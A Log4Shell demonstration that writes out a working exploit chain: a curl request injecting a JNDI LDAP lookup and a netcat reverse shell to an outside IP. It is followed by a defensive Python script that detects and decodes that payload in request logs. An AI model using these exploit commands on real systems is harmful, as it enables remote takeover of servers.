Log4j Demonstration

vulnerable server
malicious ldap server
listening for remote shell
netcat listener
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
nc 3.86.225.135 4444 -e /bin/sh
base64 encode the remote shell command
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
errors on the vulnerable server
received the command
Profit! The server is owned.
ref: https://www.lunasec.io/docs/blog/log4j-zero-day/
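
For triage on the defending side, the following added example (not code from the original post) scans request-log lines for the ${jndi:ldap://...} string used in the curl command above, extracts the callback host and port, and decodes the Base64 command segment. The log-line format, the client address 203.0.113.7 and the name triage_line are assumptions made for the illustration; the pattern matches only the plain form shown in this post.

```python
import base64
import re
from urllib.parse import urlsplit

# Matches only the plain ${jndi:ldap://...} form shown in this post.
JNDI_RE = re.compile(r"\$\{jndi:(ldap://[^}\s]+)\}", re.IGNORECASE)
B64_MARKER = "/Basic/Command/Base64/"

# Constructed sample log lines (format is an assumption); the header value
# in the second line is the one from the curl command in this post.
SAMPLE_LINES = [
    '203.0.113.7 GET / X-Api-Version="1.0"',
    '203.0.113.7 GET / X-Api-Version="${jndi:ldap://3.86.225.135:1389'
    '/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}"',
]


def triage_line(line):
    """Return a finding dict for one log line, or None if no lookup string."""
    match = JNDI_RE.search(line)
    if not match:
        return None
    url = match.group(1)
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        port = None
    finding = {"url": url, "callback_host": parts.hostname,
               "callback_port": port, "command": None}
    if B64_MARKER in parts.path:
        blob = parts.path.split(B64_MARKER, 1)[1]
        blob += "=" * (-len(blob) % 4)  # restore stripped padding
        try:
            raw = base64.b64decode(blob, validate=True)
            finding["command"] = raw.decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            finding["command"] = "<undecodable>"
    return finding


if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(triage_line(sample))
```

The decoded command and callback address give responders the outbound destination to look for in egress and process logs on the affected host.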
